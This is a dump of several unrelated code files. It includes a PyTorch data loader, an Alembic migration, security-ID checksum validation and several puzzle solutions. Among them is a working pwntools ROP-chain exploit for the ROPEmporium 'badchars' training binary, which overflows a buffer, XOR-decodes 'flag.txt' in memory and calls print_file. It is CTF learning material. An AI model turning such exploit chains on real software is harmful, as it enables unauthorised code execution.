twe3[1476-1]\r\ndel twe3[544-1]\r\ndel twe3[525-1]\r\ndel twe3[524-1]\r\ndel twe3[493-1]\r\ndel twe3[481-1]\r\ndel twe3[455-1]\r\ndel twe3[454-1]\r\n\r\nb4=scipy.io.loadmat('../newmachine34_1_6000_true.mat')['djg3']\r\ntwe4 = []\r\nfor i in range(6000):\r\n    for j in range(1):\r\n        twe4.append(b4[j][i])\r\n\r\nb5=scipy.io.loadmat('../newmachine_1_15000_true.mat')['djg3']\r\ntwe5 = []\r\nfor i in range(15000):\r\n    for j in range(1):\r\n        twe5.append(b5[j][i])\r\n\r\nb6=scipy.io.loadmat('../newmachine_30_360_true_rand6.mat')['djg3']\r\ntwe6 = []\r\nfor i in range(360):\r\n    for j in range(30):\r\n        twe6.append(b6[j][i])\r\n\r\nb7=scipy.io.loadmat('../newmachine_1_5400_true.mat')['djg3']\r\ntwe7 = []\r\nfor i in range(5400):\r\n    for j in range(1):\r\n        twe7.append(b7[j][i])\r\n\r\nval_b=scipy.io.loadmat('../newmachine_30_360_true_rand5.mat')['djg3']\r\nval_twe = []\r\nfor i in range(360):\r\n    for j in range(30):\r\n        val_twe.append(val_b[j][i])\r\n# '''\r\n\r\nclass MyDataset(Dataset):\r\n    def __init__(self,data,target,transform=None,transform_target=None):\r\n        self.data=data\r\n        # self.data_f = data_f\r\n        self.target=target\r\n        self.transform=transform\r\n        self.transform_target = transform_target\r\n    def __getitem__(self,index):\r\n        data=self.data[index]\r\n        data=data.astype(np.float32)\r\n        data=Image.fromarray(data)\r\n        if self.transform is not None:\r\n            data=self.transform(data)\r\n        data=np.array(data)\r\n        data=data.reshape(1,512,128)\r\n\r\n        # data_f = self.data_f[index]\r\n        # data_f = data_f.astype(np.float32)\r\n        # data_f = Image.fromarray(data_f)\r\n        # if self.transform is not None:\r\n        #     data_f = self.transform(data_f)\r\n        # data_f = np.array(data_f)\r\n        # data_f = data_f.reshape(1, 512, 128)\r\n\r\n        target=self.target[index]\r\n        target=target.astype(np.float32)\r\n        target=Image.fromarray(target)\r\n        if self.transform_target is not None:\r\n            target=self.transform_target(target)\r\n        target=np.array(target)\r\n        target=target.reshape(1,128,128)\r\n\r\n        return data,target\r\n    def __len__(self):\r\n        return len(self.data)\r\n\r\ntransform=transforms.Compose([\r\n    # transforms.RandomVerticalFlip(p=1),\r\n    transforms.RandomHorizontalFlip(p=1),\r\n    # 
transforms.ToTensor(),\r\n])\r\ntransform_target=transforms.Compose([\r\n    transforms.RandomRotation(degrees=(90,90)),\r\n    transforms.RandomHorizontalFlip(p=1),\r\n    # transforms.ToTensor()\r\n])\r\nimport scipy.signal as signal\r\ndef stft_pic(img):\r\n    # (fixed) allocate once; the original re-created `begin` inside the loop, keeping only the last column's STFT\r\n    begin = np.zeros(shape=(257,128*3))\r\n    for i in range(128):\r\n        aaa = signal.stft(img[:,i],nperseg=512,nfft=512)\r\n        begin[:,i:i+3] = aaa[2]\r\n    begin = cv2.resize(begin,(128,512),interpolation=cv2.INTER_NEAREST)\r\n    return begin\r\n\r\nimport random\r\ndata_ori = qwe + qwe2 + qwe3 + qwe4 + qwe5 + qwe6 + qwe7 + val_qwe\r\ntarget_ori = twe + twe2 + twe3 + twe4 + twe5 + twe6 + twe7 + val_twe\r\n# f = h5py.File('../dataset.h5', 'w')\r\n# f.create_dataset('data', data=data_ori)\r\n# f.create_dataset('target', data=target_ori)\r\n# f.close()\r\n# shuffle once (the shared seed keeps data and target aligned)\r\nrandnum = random.randint(0,100)\r\nrandom.seed(randnum)\r\nrandom.shuffle(data_ori)\r\nrandom.seed(randnum)\r\nrandom.shuffle(target_ori)\r\n# shuffle once more (zipping keeps each (data, target) pair together)\r\ncc = list(zip(data_ori, target_ori))\r\nrandom.shuffle(cc)\r\ndata_ori[:], target_ori[:] = zip(*cc)\r\n\r\nf = h5py.File('../dataset_shuttle.h5', 'w')\r\nf.create_dataset('data', data=data_ori)\r\nf.create_dataset('target', data=target_ori)\r\nf.close()\r\n\r\ndata_debug = data_ori[0:10000]\r\ntarget_debug = target_ori[0:10000]\r\nf = h5py.File('../dataset_debug.h5', 'w')\r\nf.create_dataset('data', data=data_debug)\r\nf.create_dataset('target', data=target_debug)\r\nf.close()\r\n\r\n'''\r\nqwe50 = data_ori[0:58126]#72677-19=72658 *0.8 = 58126\r\nprint(len(qwe50))\r\nline=[]\r\nfor i in range(129,385):\r\n    line.append(i)\r\ndata=[]\r\n# data_f = []\r\nfor i in range(58126):\r\n    aa_ori = np.array(qwe50[i])\r\n    # aa = aa[line,:]\r\n    # aa += np.random.normal(0, 0.1, (256, 128))#addnoise\r\n    # aa=cv2.resize(aa,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n    # aa = stft_pic(aa_ori)\r\n    # new = zscorenorm(aa)\r\n    # data_f.append(new)\r\n\r\n    new = zscorenorm(aa_ori)\r\n    data.append(new)\r\n\r\ntwe50 = target_ori[0:58126]\r\ntarget=[]\r\nfor i in range(58126):\r\n    bb=np.array(twe50[i].T)\r\n    bb=cv2.resize(bb,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n    bbnew = zscorenorm(bb)\r\n    target.append(bbnew)\r\n\r\nval_qwe = data_ori[58126:72658]\r\nprint(len(val_qwe))\r\nval_data = []\r\nfor i in range(14532):\r\n    aa_ori = np.array(val_qwe[i])\r\n    # aa = aa[line, :]\r\n    # aa += np.random.normal(0, 0.1, (256, 128))\r\n    # aa=cv2.resize(aa,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n    # aa = stft_pic(aa_ori)\r\n    # new = zscorenorm(aa)\r\n    # val_data_f.append(new)\r\n\r\n    new = zscorenorm(aa_ori)\r\n    val_data.append(new)\r\n\r\nval_twe = target_ori[58126:72658]\r\nval_target = []\r\nfor i in range(14532):\r\n    bb=np.array(val_twe[i].T) #\r\n    bb=cv2.resize(bb,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n    bbnew = zscorenorm(bb)\r\n    val_target.append(bbnew)\r\n\r\n# wrap the datasets with DataLoader\r\ntrain_data=MyDataset(data,target,transform=None,transform_target=None)\r\nvalid_data=MyDataset(val_data,val_target,transform=None,transform_target=None)\r\n# train_data2=MyDataset(data,target,transform=transform,transform_target=transform_target)\r\n# valid_data2=MyDataset(val_data,val_target,transform=transform,transform_target=transform_target)\r\nBATCH_SIZE=32\r\ntrain_loader=DataLoader(train_data,BATCH_SIZE,True)\r\nvalid_loader=DataLoader(valid_data,BATCH_SIZE,True)\r\n# train_loader=DataLoader(train_data + train_data2,BATCH_SIZE,True)\r\n# valid_loader=DataLoader(valid_data + valid_data2,BATCH_SIZE,True)\r\n# 
'''\r\n","repo_name":"ddyss/Res-Unet","sub_path":"my_code_for_PAT/dataloader_shuffle.py","file_name":"dataloader_shuffle.py","file_ext":"py","file_size_in_byte":8245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34979680012","text":"\"\"\"empty message\n\nRevision ID: 3153bc18bc7\nRevises: c12eaccb31\nCreate Date: 2015-03-05 05:41:00.937352\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3153bc18bc7'\ndown_revision = 'c12eaccb31'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('side_catalog_attributes',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('entiny_type_id', sa.Integer(), nullable=True),\n    sa.Column('attribute_code', sa.String(), nullable=True),\n    sa.Column('frontend_label', sa.String(), nullable=True),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_table('side_catalog_properties',\n    sa.Column('value_id', sa.Integer(), nullable=False),\n    sa.Column('option_id', sa.Integer(), nullable=True),\n    sa.Column('value', sa.String(), nullable=True),\n    sa.Column('attribute_id', sa.Integer(), nullable=True),\n    sa.Column('attribute_code', sa.String(), nullable=True),\n    sa.PrimaryKeyConstraint('value_id')\n    )\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('side_catalog_properties')\n    op.drop_table('side_catalog_attributes')\n    ### end Alembic commands ###\n","repo_name":"silago/hairy-octo-dubstep-ked-back","sub_path":"migrations/versions/3153bc18bc7_.py","file_name":"3153bc18bc7_.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29562124856","text":"from pwn import *\n\nbinary = context.binary = ELF(\"./badchars\", checksec=False)\np = process(binary.path)\n\n\n\ndef convertASCII_to_Hex(value):\n    res = \"\"\n    for i in value:\n        res += hex(ord(i))[2:]\n    return res\n\ndef changeEndian(value):\n    length = len(value)\n    res = \"0x\"\n    for i in range(length-1, 0, -2):\n        res += value[i-1]+ value[i]\n    return res\n\ndef generateString(value):\n    return int(changeEndian(convertASCII_to_Hex(value)), 16)\n\ndef xorByTwo(value):\n    res = \"\"\n    for i in value:\n        res += chr(int(convertASCII_to_Hex(i), 16) ^ 2)\n    return res\n\nflag = p64(generateString(xorByTwo(\"flag.txt\"))) # will convert flag.txt to a usable format to write to memory & xor the bad bytes\n\n\npadding = b\"\\x90\"*40 # initial padding up to the saved return address\npop_r12_r13_r14_r15 = p64(0x40069c) # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret\npop_r14_r15 = p64(0x4006a0) # pop r14 ; pop r15 ; ret\nwriteable = 0x601337 # writeable segment in memory within .bss\nxor_gadget = p64(0x400628) # xor byte ptr [r15], r14b ; ret\npop_rdi = p64(0x04006a3) # pop rdi; ret\nprint_file = p64(0x00400510) # addr of print_file@plt\nwrite_gadget = p64(0x0400634) # mov qword ptr [r13], r12 ; ret\n\n\n# write flag into memory\npayload = padding\npayload += pop_r12_r13_r14_r15\npayload += flag + p64(writeable) + p64(1337) + p64(1337) # 1337's junk for the r14 and r15 registers\npayload += write_gadget\n\nfor index in range(8):\n    payload += pop_r14_r15\n    payload += p64(2) + p64(writeable + index) # 2 is our XOR key; we pass it together with the target byte's address\n    # (writeable + index, for index in [0..7]), \"decrypting\" our flag in memory one byte at a time.\n    # We need this because XOR is a cheap, reversible form of encryption.
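\n    # (added) e.g. xorByTwo(\"flag.txt\") == \"dnce,vzv\"; the gadget writes queued below XOR key 2 back into each byte at 0x601337, restoring \"flag.txt\" before print_file() runs.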
\n    payload += xor_gadget # xor each index in r15 by the values within r14\n\n# feed the memory location of our flag to the print_file() function\npayload += pop_rdi # pop rdi; ret\npayload += p64(writeable) # writeable segment within memory at .bss segment\npayload += print_file # print_file() location\n\nlog.info(f\"flag.txt after being changed by xoring: {flag}\")\n\np.clean()\np.sendline(payload)\nprint(p.recvuntil(b\"ROPE{a_placeholder_32byte_flag!}\"))\np.close()\n","repo_name":"pwnpope/ROPemporium","sub_path":"badchars.py","file_name":"badchars.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2046612642","text":"from abc import ABCMeta, abstractmethod\nfrom math import isnan\n\nfrom cymbology.exceptions import (\n    IdError, NullError, LengthError,\n    InvalidCharacterError, CheckDigitError, CheckSumError\n)\n\n\nclass SecurityId(metaclass=ABCMeta):\n    \"\"\"A financial security id that can be validated.\n\n    Attributes\n    ----------\n    MIN_LEN : int\n        minimum length of security id with check digit.\n    MAX_LEN : int\n        maximum length of security id with check digit.\n\n    Notes\n    -----\n    \"sid\" input variable name implies security id with check digit appended.\n    \"sid_\" input variable name implies security id w/o check digit.\n    \"\"\"\n\n    MIN_LEN = 1\n    MAX_LEN = None\n\n    def validate(self, sid):\n        \"\"\"validate security id string.\n\n        returns sid if it is valid, else raises an IdError exception.\n        \"\"\"\n\n        null_check(sid)\n        check_sum = self.calculate_checksum(sid[:-1])\n        check_digit = val_check_digit(sid)\n\n        if check_sum == check_digit:\n            return sid\n        else:\n            message = 'The check sum, {}, does not equal the check digit {}'\n\n            raise CheckSumError(message.format(check_sum, check_digit))\n\n    def is_valid(self, sid):\n        \"\"\"True if sid is valid security id string, else False.\"\"\"\n\n        try:\n            return bool(self.validate(sid))\n        except IdError:\n            return False\n\n    def calculate_checksum(self, sid_):\n        \"\"\"calculate the check digit.\"\"\"\n\n        self._id_check(sid_, offset=1)\n\n        try:\n            return self._calculate_checksum(sid_)\n        except KeyError:\n            raise InvalidCharacterError(\n                '{} identifier contains invalid characters'.format(\n                    self.__class__.__qualname__\n                )\n            )\n\n    @abstractmethod\n    def _calculate_checksum(self, sid_):\n        NotImplementedError\n\n    def append_checksum(self, sid_):\n        \"\"\"calculate and append check sum digit to security id.\"\"\"\n\n        sid_ += str(self.calculate_checksum(sid_))\n        return sid_\n\n    def __str__(self):\n        return \"<cymbology %s>\" % self.__class__.__name__\n\n    def _id_check(self, sid_, offset=0):\n\n        null_check(sid_)\n\n        if not (self.MIN_LEN - offset) <= len(sid_) <= (self.MAX_LEN - offset):\n            raise LengthError(\n                length_error_message(\n                    self.__class__.__qualname__, self.MIN_LEN, self.MAX_LEN\n                )\n            )\n\n        self._additional_checks(sid_)\n\n    def _additional_checks(self, sid_):\n        pass\n\n\ndef null_check(sid):\n    \"\"\"Check if id string is null.\"\"\"\n\n    if not sid or (isinstance(sid, float) and isnan(sid)):\n        raise NullError\n\n\ndef val_check_digit(sid):\n    \"\"\"checks if check digit can convert to integer.\"\"\"\n\n    try:\n        return int(sid[-1])\n    except ValueError:\n        raise CheckDigitError(\n            \"The identifier's check digit must be an integer.\"\n        )\n\n\ndef length_error_message(identifier, min_length=None, max_length=None):\n    \"\"\"Build length error message.\"\"\"\n\n    additional = []\n\n    if min_length:\n        additional.append('at least length {}'.format(min_length))\n\n    if max_length:\n        additional.append('at most length {}'.format(max_length))\n\n    body = ', '.join(additional)\n    message = '{} identifier input must {}.'.format(identifier, body)\n\n    return message
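\n\n# (added sketch) a concrete identifier class only has to supply _calculate_checksum; e.g. a\n# hypothetical Mod11Id(SecurityId) with MAX_LEN = 9 would inherit validate(), is_valid()\n# and append_checksum() unchanged.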
{}'.format(min_length))\n\n if max_length:\n additional.append('at most length {}'.format(max_length))\n\n body = ', '.join(additional)\n message = '{} identifier input must {}.'.format(identifier, body)\n\n return message\n","repo_name":"pmart123/cymbology","sub_path":"cymbology/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"7292817415","text":"# If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there \n# are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n# If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, \n# how many letters would be used?\n# NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-two) \n# contains 23 letters and 115 (one hundred and fifteen) contains 20 letters. The use of \"and\" when writing out numbers is in compliance with British usage.\n# Result: 21124\n\nimport math\nfrom typing import Set, List, Tuple, Dict\nfrom functools import reduce\nimport time\nimport sys\nsys.path.append(\".\")\nfrom util import prime_factors, triangle_number\n\n\ndictionary = {\n 0: 0,\n 1: 3,\n 2: 3,\n 3: 5,\n 4: 4,\n 5: 4,\n 6: 3,\n 7: 5,\n 8: 5,\n 9: 4,\n 10: 3,\n 11: 6,\n 12: 6,\n 13: 8,\n 14: 8,\n 15: 7,\n 16: 7,\n 17: 9, \n 18: 8, \n 19: 8, \n 20: 6,\n 30: 6,\n 40: 5,\n 50: 5,\n 60: 5,\n 70: 7,\n 80: 6,\n 90: 6,\n 1000: 11\n}\n\nhundred = 7\nan = 3\n\ndef letter_count_all_through(n: int) -> int:\n return sum([ letter_count(d) for d in range(n + 1) ])\n\ndef letter_count(n: int) -> int:\n if n in dictionary:\n return dictionary[n]\n count = 0\n last_two = n % 100\n if last_two in dictionary:\n # 0-19\n count += dictionary[last_two]\n else:\n last_one = last_two % 10\n count += dictionary[last_one]\n count += dictionary[last_two - last_one]\n n //= 100\n if n:\n count += hundred\n if last_two:\n count += an\n count += dictionary[n]\n return count\n\nif __name__ == '__main__':\n \"\"\"starts here\"\"\"\n n = 1000\n start = time.time()\n print(letter_count_all_through(n)) # 21124\n print(time.time() - start) # 0.0008 sec\n","repo_name":"etoitau/project-euler","sub_path":"017 number letter counts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73077295840","text":"import sys\n\nsys.stdin = open('input.txt')\n\ndef a(k,n):\n if k == 0 :\n return n\n elif n == 1:\n return 1\n\n return a(k-1,n)+a(k,n-1)\n\ntest = int(input())\nfor _ in range(test):\n k = int(input())\n n = int(input())\n\n\n print(a(k,n))\n","repo_name":"cmkds/algo","sub_path":"study/7_list_0814/back.2775/2775_2.py","file_name":"2775_2.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33989291895","text":"from math import *\n\nwhile 1 < 2 :\n\n\ta = int(input('enter a ==> '));\n\tb = int(input('enter b ==> '));\n\tc = int(input('enter c ==> '));\n\te = 2.7182818285;\n\tdelta = ((b**2)-4*a*c)\n\tx0 = ((-1*b)/(2*a))\n\n\tprint('∆ = b²-4ac = ',b,'² - 4 ×',a,'×',c,'=' ,delta);\n\tif delta > 0 :\n\t\tx1 = ((-1*b+sqrt(delta))/(2*a))\n\t\tx2 = ((-1*b-sqrt(delta))/(2*a))\n\t\tq_1 = str(input('do u want to see the solutions (yes/no) => '))\n\t\tif q_1 == 'yes' :\n\t\t\tprint('x1 = ', x1)\n\t\t\tprint('x2 = ', x2)\n\t\tif q_1 == 'no' 
:\n\t\t\tprint('okay...')\n\tif delta == 0 :\n\t\tq_2 = str(input('do u want to see the solutions (yes/no) => '))\n\t\tif q_2 == 'yes' :\n\t\t\tprint('x0 = ', x0)\n\t\tif q_2 == 'no' :\n\t\t\tprint('okay...')\n\tif delta < 0 :\n\t\tprint('there is no solution')\n","repo_name":"phenix1001/Delta","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20090104994","text":"# -*- coding:UTF-8 -*-\nimport os\nimport re\n\n\ndef strQ2B(ustring):\n '''全角转半角'''\n rstring = ''\n for uchar in ustring:\n inside_code = ord(uchar)\n if inside_code == 12288: # 全角空格直接转换\n inside_code = 32\n elif (inside_code >= 65281 and inside_code <= 65374): # 全角字符(除空格)根据关系转化\n inside_code -= 65248\n rstring += chr(inside_code)\n return rstring\n\n\ndef escape(text):\n '''html转义'''\n text = (text.replace(\""\", \"\\\"\").replace(\"“\", \"“\").replace(\"”\", \"”\")\n .replace(\"·\", \"·\").replace(\"’\", \"’\").replace(\"“\", \"“\")\n .replace(\"”\", \"\\”\").replace(\"—\", \"——\").replace(\"…\", \"…\")\n .replace(\"•\", \"·\").replace(\"(\", \"(\").replace(\")\", \")\")\n .replace(\"·\", \"·\").replace(\"&\", \"&\").replace(\"•\", \"·\")\n .replace(\"<\", \"<\").replace(\"<\", \"<\").replace(\">\", \">\")\n .replace(\">\", \">\").replace(\" \", \" \").replace(\" \", \" \")\n .replace(\"˜\", \"~\").replace(\"—\", \"—\").replace(\"©\", \"@\")\n .replace(\"©\", \"@\").replace(\"♂\", \"\").replace(\"\\r\\n|\\r\", \"\\n\").replace(' ', ' '))\n return text\n\n\ndef read_sogou_report():\n base = 'Reduced/'\n types = os.listdir(base)\n sentences = []\n count = 0\n index = 0\n for type in types:\n # type = 'C000008'\n docs = os.listdir(base + type)\n for doc in docs:\n file = None\n try:\n file = open(base + type + '/' + doc, 'r', encoding='gbk')\n content = escape(strQ2B(file.read())).replace(r'\\s', '').replace(r'\\n\\d+\\n', '')\n lines = re.split(r'\\n', re.sub(r'[ \\t\\f]+', r'', content))\n for line in lines:\n sentences.extend(line.split('。'))\n # break\n file.close()\n except UnicodeDecodeError as e:\n count += 1\n file.close()\n # sentences.append(content)\n\n return sentences\n\ndef estimate_cws(current_labels,correct_labels):\n cor_dict = {}\n curt_dict = {}\n curt_start = 0\n cor_start = 0\n for label_index,(curt_label,cor_label) in enumerate(zip(current_labels,correct_labels)):\n if cor_label == 0:\n cor_dict[label_index] = label_index + 1\n elif cor_label == 1:\n cor_start = label_index\n elif cor_label == 3:\n cor_dict[cor_start] = label_index + 1\n\n if curt_label == 0:\n curt_dict[label_index] = label_index + 1\n elif curt_label == 1:\n curt_start = label_index\n elif curt_label == 3:\n curt_dict[curt_start] = label_index + 1\n\n cor_count = 0\n recall_length = len(curt_dict)\n prec_length = len(cor_dict)\n for curt_start in curt_dict.keys():\n if curt_start in cor_dict and curt_dict[curt_start] == cor_dict[curt_start]:\n cor_count += 1\n\n return cor_count,prec_length,recall_length\n\nif __name__ == '__main__':\n sentences = read_sogou_report()\n file = open('corpus/sougou.txt', 'w', encoding='utf-8')\n print(len(sentences))\n content = ''.join(sentences)\n content = re.sub('[\\0]', '', content)\n file.write(content)\n file.close()\n","repo_name":"supercoderhawk/DNN_CWS","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"54"} 
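A note on the estimate_cws helper in the DNN_CWS utils record above: it returns raw span counts rather than rates, and its return names are misleading — the second value (prec_length) is the number of gold-standard segments and the third (recall_length) is the number of predicted segments, whereas precision conventionally divides by the predicted count and recall by the gold count. The following is a minimal, hypothetical sketch (not part of the dataset) of turning those counts into precision/recall/F1 when pasted alongside the estimate_cws definition, assuming, as the span logic implies, that labels 0/1/2/3 encode single/begin/middle/end:

def prf_from_counts(cor_count, gold_count, pred_count):
    # precision: matched spans / predicted spans; recall: matched spans / gold spans
    precision = cor_count / pred_count if pred_count else 0.0
    recall = cor_count / gold_count if gold_count else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return precision, recall, f1

pred_labels = [1, 3, 0, 1, 3]  # predicted spans: [0,2) [2,3) [3,5)
gold_labels = [1, 3, 1, 2, 3]  # gold spans:      [0,2) [2,5)
cor, gold_n, pred_n = estimate_cws(pred_labels, gold_labels)
print(prf_from_counts(cor, gold_n, pred_n))  # (0.333..., 0.5, 0.4)

With these sample labels, one of the three predicted spans matches one of the two gold spans, giving P = 1/3, R = 1/2, F1 = 0.4.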
+{"seq_id":"31243436728","text":"import yfinance as yf\nimport pandas as pd\n\n\ndef max_daily_change(indices, intrvl='1d', quantity=0, add_ns=1):\n def ns(x):\n return x+'.NS'\n if add_ns == 0:\n df = yf.download(tickers=indices, period='1d', interval=intrvl)\n else:\n df = yf.download(tickers=list(map(ns, indices)),\n period='1d', interval=intrvl)\n df = df.dropna()\n df = df.iloc[-1]\n df = pd.DataFrame(df[[\"Open\", \"High\", \"Low\", \"Close\"]])\n df = df.round(decimals=2)\n\n # print(df.index)\n df = df.T\n arr = []\n for i in df['Open']:\n arr.append(i)\n df2 = pd.DataFrame(arr, columns=['Name'])\n df2.set_index('Name', inplace=True)\n # print(df2)\n arr = []\n for i in df.iloc[-1]['Open']:\n arr.append(i)\n df2['Open'] = arr\n arr = []\n for i in df.iloc[-1]['High']:\n arr.append(i)\n df2['High'] = arr\n arr = []\n for i in df.iloc[-1]['Low']:\n arr.append(i)\n df2['Low'] = arr\n arr = []\n for i in df.iloc[-1]['Close']:\n arr.append(i)\n df2['Close'] = arr\n\n temp = (df2['High'] + df2['Low'])/2\n df2['Average'] = temp\n\n #temp = ((df2['High'] - df2['Low'])*100) / df2['Average']\n temp = ((abs(df2['Close'] - df2['Open']))*100) / df2['Open']\n df2['Change%'] = temp\n\n temp = (df2['Close']-df2['Open'])\n df2['Diff'] = temp\n\n final_df = pd.DataFrame(df2.sort_values(\n by=['Change%'], ascending=False))\n\n print(final_df)\n # if add_ns == 0:\n final_df = final_df[['Change%']]\n\n idx = list(final_df.index)\n for i in range(len(idx)):\n try:\n idx[i] = idx[i].replace('&', '_')\n except:\n pass\n\n try:\n idx[i] = idx[i].replace('.NS', '')\n while(len(idx[i]) != 20):\n idx[i] += '_'\n\n except:\n pass\n\n final_df.index = idx\n if quantity != 0:\n final_df = final_df.head(quantity)\n\n upload_lst = ''\n for i in final_df.index:\n if '_' in i:\n j = i.replace('_', '')\n j += ','\n upload_lst += j\n\n f = open(\"/Users/amlanpatra/Desktop/stk/change.txt\", \"w\")\n f.write(upload_lst)\n f.close()\n\n return final_df\n","repo_name":"amlanpatra/daily_stock","sub_path":"daily_change.py","file_name":"daily_change.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9704353997","text":"#https://www.codewars.com//kata/598e045b8c13926d8c0000e8\ndef break_caesar(message):\n alphabet = [char for char in \"abcdefghijklmnopqrstuvwxyz\"]\n hits = {} \n for x in range(len(alphabet)): \n newmsg = \"\"\n for y in range(len(message)):\n if message[y].isalpha():\n charToAdd = alphabet[(alphabet.index(message[y].lower())+x)%26] \n newmsg = newmsg + charToAdd\n elif message[y]==' ': \n charToAdd = message[y]\n newmsg = newmsg + charToAdd \n splitTrash = newmsg.split() \n numHits = 0\n for w in splitTrash:\n if w in WORDS:\n numHits+=1 \n hits[numHits]=x \n greatest = 0 \n for h in hits.keys():\n if h > greatest:\n greatest = h\n if hits[greatest] == 0: \n return 0\n else:\n return 26 - hits[greatest]\n","repo_name":"Kerbel-A/UIRS","sub_path":"5kyu/Break the Caesar!.py","file_name":"Break the Caesar!.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73168511202","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom LIB.data_conn import *\r\nfrom LIB.questionWidget import *\r\nfrom LIB.navbar import *\r\n\r\nclass EditTest(ttk.LabelFrame):\r\n \"\"\"A class to create frame objects used in an App\"\"\"\r\n def __init__(self, window, title):\r\n super().__init__(window)\r\n self.window = 
window\r\n self.title = title\r\n self['text'] = self.title\r\n gridOptions = {'padx':5, 'pady':5, 'sticky':tk.NSEW}\r\n self.grid(row = 0, column = 0, **gridOptions)\r\n #Create an instance of the nav bar\r\n self.navigation = NavBar(self.window, self)\r\n self.itemFrame = ttk.Frame(self)\r\n self.itemFrame.grid(row=1, column=1,sticky=tk.NSEW, pady=5, padx=5)\r\n self.DBconn = Database(\"AM.db\")\r\n\r\n\r\n def populate(self, data, fields):\r\n self.data = data\r\n r, c=0,0\r\n for i in range(0, len(fields)):\r\n self.label = ttk.Label(self.itemFrame, text = fields[i])\r\n self.label.grid(row =r, column=c,padx=5, pady=5, sticky=tk.W)\r\n self.entryVar = tk.StringVar()\r\n self.entry = ttk.Entry(self.itemFrame)\r\n self.entry.insert(0,data[i])\r\n self.entry.grid(row=r, column=c+1, padx=5, pady=5, sticky=tk.W)\r\n r+=1\r\n self.addLabel = ttk.Label(self.itemFrame, text =\"Add Questions:\")\r\n self.addLabel.grid(row= r, column = c, pady=5, padx=5, sticky=tk.W)\r\n #Add questions option menu\r\n self.optionVar = tk.StringVar()\r\n self.questions = self.DBconn.getNewQuestions(data[4])\r\n self.addMenu = tk.OptionMenu(self.itemFrame, self.optionVar,self.questions[0], *self.questions)\r\n self.addMenu.configure(width=15)\r\n self.addMenu.grid(row = r, column = c+1, pady=5, padx=5, sticky=tk.W)\r\n #Add button\r\n self.addButton= ttk.Button(self.itemFrame, text = \"+\", command = self.addQuestions, width=5)\r\n self.addButton.grid(row = r, column=2, padx=5, pady=5, sticky=tk.W)\r\n\r\n self.questAns = self.DBconn.getQuestionAnswer(data[0])\r\n self.questionsFrame = ttk.LabelFrame(self.itemFrame, text=\"Questions in Test\")\r\n self.questionsFrame.grid(row=0, column=3, pady=5,padx=5, sticky=tk.NSEW, rowspan=10)\r\n self.q_row, self.q_col = 0, 0\r\n for q in self.questAns:\r\n Question(self.questionsFrame,q[0], q[1],q[2],self.q_row, self.q_col)\r\n self.q_row+=1\r\n\r\n def addQuestions(self):\r\n q = self.optionVar.get().strip(\"\"\" ,()'\"\"\" ).strip(\"'\")\r\n new_q = q.split(\",\")\r\n Question(self.questionsFrame, new_q[0], new_q[1], new_q[2],self.q_row, self.q_col)\r\n self.q_row+=1\r\n #Make saves to DB\r\n self.DBconn.addData(\"test_parts\", (self.data[0], new_q[0]))\r\n\r\n def goBack(self):\r\n #clear the holding fraem\r\n question_wids=self.itemFrame.winfo_children()\r\n for q in question_wids:\r\n q.destroy()\r\n self.window.show_frame(1)\r\n\r\n","repo_name":"oreange/schoolsystem","sub_path":"editTest.py","file_name":"editTest.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5613192048","text":"# 咕噜咕噜的丁丁\n# 不浪费一分一秒\n# 你可以的\n# 时间:2021/9/16 16:29\ndef fib(n):\n if n==1:\n return 1\n elif n==2:\n return 1\n else:\n return fib(n-1)+fib(n-2)\n\n#斐波那契数列第6位上的数字\nprint(fib(6))\n\nprint('----------')\n# 输出这个数列前6位上的数字\nfor i in range(1,7):\n print(fib(i))","repo_name":"cc852852/vippython","sub_path":"chap10/demo11.py","file_name":"demo11.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26334864614","text":"import subprocess as sp\r\nimport csv\r\nimport para_best as 